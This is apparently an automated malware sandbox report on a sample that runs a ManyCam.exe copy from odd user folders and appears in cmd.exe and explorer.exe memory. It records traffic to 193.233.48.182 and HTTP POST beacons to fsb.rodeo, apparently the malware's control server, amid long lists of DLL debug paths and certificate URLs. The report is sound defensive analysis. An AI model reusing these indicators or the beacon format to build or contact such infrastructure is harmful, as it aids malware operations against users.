Source: Yara match	File source: 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ManyCam.exe PID: 6228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ManyCam.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 2260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ManyCam.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ManyCam.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 6276, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 193.233.48.182:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.233.48.182:443 -> 192.168.2.4:49740 version: TLS 1.2

Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb0 source: ManyCam.exe, 00000002.00000003.1722253839.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728838914.0000000010062000.00000002.00000001.01000000.00000004.sdmp, ManyCam.exe, 00000004.00000002.1782423953.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 0000000D.00000002.2146322134.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 00000014.00000002.2265644240.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, cximagecrt.dll.2.dr
Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb source: ManyCam.exe, 00000002.00000003.1722253839.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728838914.0000000010062000.00000002.00000001.01000000.00000004.sdmp, ManyCam.exe, 00000004.00000002.1782423953.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 0000000D.00000002.2146322134.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 00000014.00000002.2265644240.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, cximagecrt.dll.2.dr
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8` source: ManyCam.exe, 00000002.00000003.1722869253.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1726574265.0000000000CED000.00000002.00000001.01000000.00000008.sdmp, ManyCam.exe, 0000000D.00000002.2143708101.0000000001CBD000.00000002.00000001.01000000.00000011.sdmp, highgui099.dll.1.dr, highgui099.dll.2.dr
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8`5 source: ManyCam.exe, 00000014.00000002.2263483979.000000000134D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdb source: ManyCam.exe, 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmp, ManyCam.exe, 00000002.00000003.1722213062.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1780407779.00000000012A1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 0000000D.00000002.2143919882.0000000001D91000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000014.00000002.2262286911.0000000000BD1000.00000002.00000001.01000000.0000000D.sdmp, cxcore099.dll.2.dr
Source:	Binary string: ntdll.pdb source: explorer.exe, 0000000C.00000002.2944291211.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943743699.00000000024CF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461769193.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461462563.000000000285A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: diaLocatePDB-> Looking for %s... %s%s.pdbFPOPDATAXDATAOMAPFROMOMAPTO$$$IP not set! source: dbghelp.dll.2.dr, dbghelp.dll.1.dr
Source:	Binary string: wntdll.pdbUGP source: ManyCam.exe, 00000002.00000002.1728344317.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728525433.0000000004610000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781701720.0000000004210000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781566718.0000000003EB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781889758.00000000045C2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016294201.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016062629.0000000004968000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145627834.0000000004620000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145908335.00000000049E4000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145394558.00000000042CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201079744.000000000473B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201420664.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265114412.0000000004200000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264930587.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265292803.00000000045B4000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459066841.0000000005508000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459492681.00000000059B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: explorer.exe, 0000000C.00000002.2944291211.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943743699.00000000024CF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461769193.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461462563.000000000285A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ManyCam.exe, 00000002.00000002.1728344317.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728525433.0000000004610000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781701720.0000000004210000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781566718.0000000003EB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781889758.00000000045C2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016294201.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016062629.0000000004968000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145627834.0000000004620000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145908335.00000000049E4000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145394558.00000000042CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201079744.000000000473B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201420664.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265114412.0000000004200000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264930587.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265292803.00000000045B4000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459066841.0000000005508000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459492681.00000000059B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8`> source: ManyCam.exe, 00000004.00000002.1780618905.00000000013DD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb source: ManyCam.exe, 00000002.00000003.1722869253.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1726574265.0000000000CED000.00000002.00000001.01000000.00000008.sdmp, ManyCam.exe, 00000004.00000002.1780618905.00000000013DD000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000D.00000002.2143708101.0000000001CBD000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000014.00000002.2263483979.000000000134D000.00000002.00000001.01000000.00000011.sdmp, highgui099.dll.1.dr, highgui099.dll.2.dr
Source:	Binary string: c:\Program Files\OpenCV\bin\cv099.pdb source: ManyCam.exe, 00000002.00000003.1721864520.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1726798935.0000000000D9F000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000004.00000002.1780537279.000000000136F000.00000002.00000001.01000000.00000010.sdmp, ManyCam.exe, 0000000D.00000002.2143577088.0000000001C4F000.00000002.00000001.01000000.00000010.sdmp, ManyCam.exe, 00000014.00000002.2263214291.00000000012DF000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdbu source: ManyCam.exe, 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmp, ManyCam.exe, 00000002.00000003.1722213062.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1780407779.00000000012A1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 0000000D.00000002.2143919882.0000000001D91000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000014.00000002.2262286911.0000000000BD1000.00000002.00000001.01000000.0000000D.sdmp, cxcore099.dll.2.dr
Source:	Binary string: d:\branch_2.5\Bin\CrashRpt.pdb source: ManyCam.exe, 00000002.00000002.1727587033.0000000002012000.00000002.00000001.01000000.00000005.sdmp, ManyCam.exe, 00000002.00000003.1721444923.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781040561.0000000002012000.00000002.00000001.01000000.0000000E.sdmp, ManyCam.exe, 0000000D.00000002.2144076067.0000000002012000.00000002.00000001.01000000.0000000E.sdmp, ManyCam.exe, 00000014.00000002.2264405365.0000000002012000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: d:\branch_2.5\bin\ManyCam.pdb source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000003.1723593860.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr
Source:	Binary string: dbghelp.pdb source: ManyCam.exe, 00000002.00000002.1728941425.000000006D511000.00000020.00000001.01000000.00000006.sdmp, ManyCam.exe, 00000004.00000002.1782504102.000000006D511000.00000020.00000001.01000000.0000000F.sdmp, ManyCam.exe, 0000000D.00000002.2146407239.000000006D511000.00000020.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000014.00000002.2265718075.000000006D511000.00000020.00000001.01000000.0000000F.sdmp, dbghelp.dll.2.dr, dbghelp.dll.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,		2_2_004164A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,		4_2_004164A0

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0Content-Length: 128Host: fsb.rodeo
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0Content-Length: 420Host: fsb.rodeo

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fsb.rodeo

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0Content-Length: 128Host: fsb.rodeo

Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
